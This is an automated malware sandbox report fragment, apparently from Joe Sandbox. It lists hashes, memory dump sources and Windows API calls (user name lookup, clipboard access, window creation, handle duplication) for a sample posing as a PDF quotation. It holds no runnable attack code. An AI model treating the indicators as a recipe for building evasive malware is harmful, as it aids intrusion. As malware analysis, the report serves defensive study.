                                                                            • Opcode Fuzzy Hash: 6502ca827480ebedc7a3957b52e120c5a892d71e82192a5877f1d2132bb7458a
                                                                            • Instruction Fuzzy Hash: 49F0C832B406104FC385A778D51896E3BF29FC932131100A8E94FCB3A2DE28CC46CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bcefc71e79b4a0049a694dfd77563e3459a3812ba8ed847842769a7143c40f0
                                                                            • Instruction ID: df2dcc8f74253492f98e8342a861d536cf5336c119e906a1fe4446c679b2e8da
                                                                            • Opcode Fuzzy Hash: 9bcefc71e79b4a0049a694dfd77563e3459a3812ba8ed847842769a7143c40f0
                                                                            • Instruction Fuzzy Hash: FFF05972B4D3915FE32213789E90369BFB19BC2201F0800DBC583CF3A2DE868806C391
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7229418ce0bf7b99d94f92c078b88b84f5d8524d8d5a60a3b87e06e856edf78
                                                                            • Instruction ID: 89d2e5bf2a2df19e05ed4ee690c98b87afa2978a951b2b381c89d4f36e69d4f7
                                                                            • Opcode Fuzzy Hash: d7229418ce0bf7b99d94f92c078b88b84f5d8524d8d5a60a3b87e06e856edf78
                                                                            • Instruction Fuzzy Hash: 32F017357046155FD3149A5ED884E57B7EAEF88A61B248069F14ACB364EA70EC018AA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62b365af627ef50afe83f81aa606f968d0c0fe3c204635e5ee72ed14099340be
                                                                            • Instruction ID: ec54726153a0c1f4da3cebb4190ef57a777f9992df4733f792012780b84cb351
                                                                            • Opcode Fuzzy Hash: 62b365af627ef50afe83f81aa606f968d0c0fe3c204635e5ee72ed14099340be
                                                                            • Instruction Fuzzy Hash: 1AF0FE76B806104F8788ABB8D51896E37F69FC87713114064E60FCB3A6EF28DC468B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 090e5e616e71ef415ab8a772ed7a5f9fe5add83da485cb14de712c74b3c151d9
                                                                            • Instruction ID: b6a4187be1ae93d0708faaddda5ee1266ee5c29bca93e93eb3acdab72b732bc0
                                                                            • Opcode Fuzzy Hash: 090e5e616e71ef415ab8a772ed7a5f9fe5add83da485cb14de712c74b3c151d9
                                                                            • Instruction Fuzzy Hash: 89F0A725B4E3C10FC71B57F455682BA6F769F9225071580EBC196CB2D7DC184C068B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 419c0a0167101806b08b92729d078ee4104ae2f2ae79d3da0d9b8e6473bffaf2
                                                                            • Instruction ID: 1aa61decb8d49a00b471d62c4b4fbed2d9b9a8567cfeb3420e406175da8fe21c
                                                                            • Opcode Fuzzy Hash: 419c0a0167101806b08b92729d078ee4104ae2f2ae79d3da0d9b8e6473bffaf2
                                                                            • Instruction Fuzzy Hash: 18F0F0301106856BC364EF6CF680686BBA6FF993307548F58D0980B6E8EF71680897E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 658c1d9f25b98e0064635308ea63737aa8db9c532ba9fabaf93e5388b3f87273
                                                                            • Instruction ID: 3041288361cf7f8551b7f07f0bb3f6bd2cd20033228399f78e66cf2e84828477
                                                                            • Opcode Fuzzy Hash: 658c1d9f25b98e0064635308ea63737aa8db9c532ba9fabaf93e5388b3f87273
                                                                            • Instruction Fuzzy Hash: 01F05530A04288AFC741CBB8D94239E3BB0DF57200F4A44E9D804CB6D1ED392E0ACB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97c88b7c943db3c26fb3fc96a8abc203769939f0639b1fc7b8cbc3638b5e65f4
                                                                            • Instruction ID: b30c3c9e5077bd423d042d96b2b9e913799608401b206d4cb6062328d4221b7b
                                                                            • Opcode Fuzzy Hash: 97c88b7c943db3c26fb3fc96a8abc203769939f0639b1fc7b8cbc3638b5e65f4
                                                                            • Instruction Fuzzy Hash: 94E04F327042189FCB54DAA8B4406DEBBEDDB48675F1040BBE50DC3644EE72E8418790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25cd2c093a2f1fcdf57e5acc79c8054ccc35ea74995a4d5d61d819b3e1009bde
                                                                            • Instruction ID: ce2fe9f0c22b736996221bcac4a4f7a9389aea013c852c2c9cfc66406f350085
                                                                            • Opcode Fuzzy Hash: 25cd2c093a2f1fcdf57e5acc79c8054ccc35ea74995a4d5d61d819b3e1009bde
                                                                            • Instruction Fuzzy Hash: 1DE0867390010CABC750DEB1DC4179EB7EDD709219F1405B5A90EE3605FF37E9158684
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1084d7dcbcb2bf97c348b01175e5f09c9cf4b0a1fa92fd277fd2cf18dfe07513
                                                                            • Instruction ID: 0d4fc2397d30026b8adafef53b3caa7a8221e0db56e9dd7a2739eae499132790
                                                                            • Opcode Fuzzy Hash: 1084d7dcbcb2bf97c348b01175e5f09c9cf4b0a1fa92fd277fd2cf18dfe07513
                                                                            • Instruction Fuzzy Hash: E7E0C9B4D0531A8FCB50DFE9944A2AEBBF4EB08304F5055AAC959E3250EB344255CBD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df692ce1e35db71010f16640aef45d01699825ef25932f1824bded70604b656d
                                                                            • Instruction ID: 9cbd73fc028f617b2f6f2dd5041d9299e5c9326ff5c2164f2cfbf4a36f27d576
                                                                            • Opcode Fuzzy Hash: df692ce1e35db71010f16640aef45d01699825ef25932f1824bded70604b656d
                                                                            • Instruction Fuzzy Hash: F7E0C232A5020CFFC740EFF4E60069EB7B5EB54300F504598E908D3744EE72AE159B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 706c1b91da30d4b918023194bc47583d877cf3acdb4764b02fc1218cd0a14f75
                                                                            • Instruction ID: 28f95a7bc0c3f4803cdb08c9c074faaabb8d9519f620e0dea5af27b7d2e197bc
                                                                            • Opcode Fuzzy Hash: 706c1b91da30d4b918023194bc47583d877cf3acdb4764b02fc1218cd0a14f75
                                                                            • Instruction Fuzzy Hash: A4E0C230A0020CEFCB40DFF4EA8166E77B5EF54300F4049A8D904D7294EE316E009B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b57659ff2771927f3e11fc1d3aca2c0f371c258e49f57e6f223f95b21d3d018c
                                                                            • Instruction ID: 8bb007ae62db1681c7c9c644fb337afe51752405b446954f103f95188e6c3a20
                                                                            • Opcode Fuzzy Hash: b57659ff2771927f3e11fc1d3aca2c0f371c258e49f57e6f223f95b21d3d018c
                                                                            • Instruction Fuzzy Hash: 74E0C731A0020CFFCB40EFF8E60069EB7B9EB48300F1049A8D908D3304EA72AE159B81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6983dfabc7d90d0da09b44ad972b4a59c7bdddba847c423edf1141ad74adfea8
                                                                            • Instruction ID: 34c2dbe9a3cde7db8cfb8c8814e84e212eb463e7b6002bf347920ec3228cfda0
                                                                            • Opcode Fuzzy Hash: 6983dfabc7d90d0da09b44ad972b4a59c7bdddba847c423edf1141ad74adfea8
                                                                            • Instruction Fuzzy Hash: 47D0A77055C3806FCB525B70645D0A93F30ADF231034104DAD146CB252C95898158F31
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

                                                                            Execution Graph

                                                                            Execution Coverage:11.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0.7%
                                                                            Total number of Nodes:457
                                                                            Total number of Limit Nodes:45
GetModuleHandleW 25099->25100 25103 52a53a3 25100->25103 25101 52a5424 25101->25101 25102 52a1458 GetModuleHandleW 25102->25103 25103->25101 25103->25102 25105 ab07eff 25104->25105 25109 ab09480 25105->25109 25120 ab0946b 25105->25120 25106 ab08522 25106->24929 25110 ab094ab 25109->25110 25111 ab08278 GetModuleHandleW 25110->25111 25112 ab09512 25111->25112 25119 ab08278 GetModuleHandleW 25112->25119 25131 ab09951 25112->25131 25136 ab09900 25112->25136 25141 ab099d0 25112->25141 25113 ab0952e 25114 ab08288 GetModuleHandleW 25113->25114 25115 ab0955a 25113->25115 25114->25115 25119->25113 25121 ab094ab 25120->25121 25122 ab08278 GetModuleHandleW 25121->25122 25123 ab09512 25122->25123 25127 ab099d0 GetModuleHandleW 25123->25127 25128 ab09900 GetModuleHandleW 25123->25128 25129 ab09951 GetModuleHandleW 25123->25129 25130 ab08278 GetModuleHandleW 25123->25130 25124 ab0952e 25125 ab08288 GetModuleHandleW 25124->25125 25126 ab0955a 25124->25126 25125->25126 25127->25124 25128->25124 25129->25124 25130->25124 25132 ab0996b 25131->25132 25133 ab0996f 25131->25133 25132->25113 25134 ab09aae 25133->25134 25135 ab09b91 GetModuleHandleW 25133->25135 25135->25134 25137 ab09915 25136->25137 25138 ab0997a 25136->25138 25137->25113 25139 ab09aae 25138->25139 25140 ab09b91 GetModuleHandleW 25138->25140 25140->25139 25142 ab09a2d 25141->25142 25143 ab09aae 25142->25143 25144 ab09b91 GetModuleHandleW 25142->25144 25144->25143 25145 52a0848 25147 52a084e 25145->25147 25146 52a091b 25147->25146 25149 52a1458 GetModuleHandleW 25147->25149 25150 52a1821 GetModuleHandleW 25147->25150 25151 52a144b 25147->25151 25149->25147 25150->25147 25152 52a141f 25151->25152 25154 52a1453 25151->25154 25152->25147 25153 52a16f6 25153->25147 25154->25153 25155 52a72e1 GetModuleHandleW 25154->25155 25156 52a1821 GetModuleHandleW 25154->25156 25157 52a82e0 GetModuleHandleW 25154->25157 25158 52a1a38 GetModuleHandleW 25154->25158 25159 52a1a48 GetModuleHandleW 25154->25159 25160 ab08261 GetModuleHandleW 
25154->25160 25161 ab08251 GetModuleHandleW 25154->25161 25162 ab08255 GetModuleHandleW 25154->25162 25163 ab08245 GetModuleHandleW 25154->25163 25164 ab082b8 GetModuleHandleW 25154->25164 25165 ab08298 GetModuleHandleW 25154->25165 25166 ab08259 GetModuleHandleW 25154->25166 25167 ab08249 GetModuleHandleW 25154->25167 25168 ab0825d GetModuleHandleW 25154->25168 25169 ab0824d GetModuleHandleW 25154->25169 25155->25154 25156->25154 25157->25154 25158->25154 25159->25154 25160->25154 25161->25154 25162->25154 25163->25154 25164->25154 25165->25154 25166->25154 25167->25154 25168->25154 25169->25154 25170 ab0af58 25171 ab0afc0 CreateWindowExW 25170->25171 25173 ab0b07c 25171->25173 25173->25173 25174 ab09ea8 25175 ab09ead GetModuleHandleW 25174->25175 25177 ab09f25 25175->25177 25178 ab0ec68 25179 ab0ec1e DuplicateHandle 25178->25179 25181 ab0ec77 25178->25181 25180 ab0ec3e 25179->25180 25182 52aec50 25183 52aec58 25182->25183 25184 52aec7b 25183->25184 25186 52aed20 6 API calls 25183->25186 25188 52aec88 25183->25188 25192 52aec90 25183->25192 25186->25183 25189 52aecd1 KiUserCallbackDispatcher 25188->25189 25191 52aecfe 25189->25191 25191->25183 25193 52aecd1 KiUserCallbackDispatcher 25192->25193 25195 52aecfe 25193->25195 25195->25183 25196 52a8cb0 25197 52a8cc8 25196->25197 25198 52a1458 GetModuleHandleW 25197->25198 25199 52a8cdd 25198->25199 25200 52a70f0 25203 52a7151 GetUserNameW 25200->25203 25202 52a723d 25203->25202

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(00000000,00000000), ref: 052A722B
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 7cf63bab8e981ef3cf8c306c78d2e991af23a8df99a1eec0eaa166fe068a1ea9
                                                                            • Instruction ID: d8916634717f2f1eceb1e6dcbdcd6be9ba8e2dc6acdc2f43a155ea373cad1650
                                                                            • Opcode Fuzzy Hash: 7cf63bab8e981ef3cf8c306c78d2e991af23a8df99a1eec0eaa166fe068a1ea9
                                                                            • Instruction Fuzzy Hash: BF51F672D102198FDB14CFA9C888B9DBBF1FF48314F188129E81AAB355D774A845CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(00000000,00000000), ref: 052A722B
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 81de537d1f878c6535b4cdcb346bec9670256f9173dffae5e110cf6244ff32f7
                                                                            • Instruction ID: 127c54719b6a91b87f821d45120769596ecbae19680e2a3a07c5c1d0107ab9b2
                                                                            • Opcode Fuzzy Hash: 81de537d1f878c6535b4cdcb346bec9670256f9173dffae5e110cf6244ff32f7
                                                                            • Instruction Fuzzy Hash: 0D51F471E102198FDB14CFA9C888B9DBBF1FF48314F18852AE81AAB354D7749845CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0AB0B06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 2ff8fafff69eaa2f7cecd11ef73310a0b596b6939636f37a03f767c25fb3be94
                                                                            • Instruction ID: 572ead805deca76a04d75cba0166bbd66ae46ffc2eb53293546f50d7711119e2
                                                                            • Opcode Fuzzy Hash: 2ff8fafff69eaa2f7cecd11ef73310a0b596b6939636f37a03f767c25fb3be94
                                                                            • Instruction Fuzzy Hash: F751D2B1D103099FDB14CF99C984ADEBFB1FF88314F24856AE818AB250D7759885CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0AB0B06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: eae09eb599a41f6fc23fa67544e7dea606c548a719fe0b807fad350ca9a1d9b4
                                                                            • Instruction ID: b7e59f16a4f48821c810c61d68ce89e3783d2b0e48817f1a8d9f4463a36a34b1
                                                                            • Opcode Fuzzy Hash: eae09eb599a41f6fc23fa67544e7dea606c548a719fe0b807fad350ca9a1d9b4
                                                                            • Instruction Fuzzy Hash: 4641C2B1D103099FDB14CF99C984ADEBFB5FF88310F24856AE418AB250D775A885CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0AB0FAF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 1fc7018be248571542470f153bd1891fc792b3f5d22e76da7083426e672207e2
                                                                            • Instruction ID: 6284790029cb36b9382b8967257b3fd27327979be496b89e9cb2bfe5cce3abfa
                                                                            • Opcode Fuzzy Hash: 1fc7018be248571542470f153bd1891fc792b3f5d22e76da7083426e672207e2
                                                                            • Instruction Fuzzy Hash: 44413DB5A003459FCB24CF99C888EAABBF5FF88314F258499D419A7361D774A941CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0AB0EC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 30fedc639b4a0888dbcf5f6f26be42ce119eea034f50bf98b60b5867fdfc6346
                                                                            • Instruction ID: 57370f575b19b8ec3ecdc93342bc4925565b26e31206c3c0e3772cfdd3a566a5
                                                                            • Opcode Fuzzy Hash: 30fedc639b4a0888dbcf5f6f26be42ce119eea034f50bf98b60b5867fdfc6346
                                                                            • Instruction Fuzzy Hash: 9B31ABB66426418FE310CF25EA5DBAA3BA6E79C312F10406BEA11CB3C1DA7C5D42CF15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            • Opcode ID: b1116652e46c6a82b98952827c4f48d88a166f8ca4ba7ff99920d8b0e074221e
                                                                            • Instruction ID: e09aff1fb996d72af1ab81b313e8ce7b5d2b80d848f3a8a3ed6cc9d47e930995
                                                                            • Opcode Fuzzy Hash: b1116652e46c6a82b98952827c4f48d88a166f8ca4ba7ff99920d8b0e074221e
                                                                            • Instruction Fuzzy Hash: DC3104B1D11288DFDB14CFA9D984BDDBBF1BF48304F248059E404AB294D7B45949CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            • Opcode ID: 7a9931eaf7ecf1943fcac33193094a815a1dac8a5ad42490508ae851d7a4d004
                                                                            • Instruction ID: 4d30b50e3075797487f7249254e82aa6202b0f84bf1f261795fd632de7c48681
                                                                            • Opcode Fuzzy Hash: 7a9931eaf7ecf1943fcac33193094a815a1dac8a5ad42490508ae851d7a4d004
                                                                            • Instruction Fuzzy Hash: C13124B1D11248DFDB14DF99CA84BCEBBF5BF48304F248019E404AB390D7B86989CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 052AECEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: fac3997882dd77ffe113be2b7f652e9da632007c9b5ebf98c94d8d8d91f75603
                                                                            • Instruction ID: 4deee98cb38d25349b18a9410fefcef50ac640d41304e2514c268eb9286f4332
                                                                            • Opcode Fuzzy Hash: fac3997882dd77ffe113be2b7f652e9da632007c9b5ebf98c94d8d8d91f75603
                                                                            • Instruction Fuzzy Hash: FE1138337101558BCB30A67DD8443AABBEEEF88320F254869D44DD3350DA31588187A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 1113 ab0eba0-ab0ec3c DuplicateHandle 1114 ab0ec45-ab0ec62 1113->1114 1115 ab0ec3e-ab0ec44 1113->1115 1115->1114
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0AB0EC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 5619d054ef16c5195ed5aa3e896f2ad8e03019e2ba769b45cd69a5ead8d89046
                                                                            • Instruction ID: 0ad6babae1d2fa573b545ed188285609b9c1049f528e11aa03083974fb67ed02
                                                                            • Opcode Fuzzy Hash: 5619d054ef16c5195ed5aa3e896f2ad8e03019e2ba769b45cd69a5ead8d89046
                                                                            • Instruction Fuzzy Hash: C221E4B59012489FDB10CFA9D984AEEBFF4FB48320F24845AE854B3350D375A945DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 1118 ab0eba8-ab0ec3c DuplicateHandle 1119 ab0ec45-ab0ec62 1118->1119 1120 ab0ec3e-ab0ec44 1118->1120 1120->1119
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0AB0EC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: b5e45fb884c75fd2f2115bb91d2add22793721b168a468810aaa2be40a192de4
                                                                            • Instruction ID: eb6b84c1c10a14a8e3d6b7e01b22d824dc64efcc3e428bfc9d505737c83254cd
                                                                            • Opcode Fuzzy Hash: b5e45fb884c75fd2f2115bb91d2add22793721b168a468810aaa2be40a192de4
                                                                            • Instruction Fuzzy Hash: 8D21F5B59002089FDB10CFAAD984ADEFFF8FB48320F14845AE814A3350D374A944CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
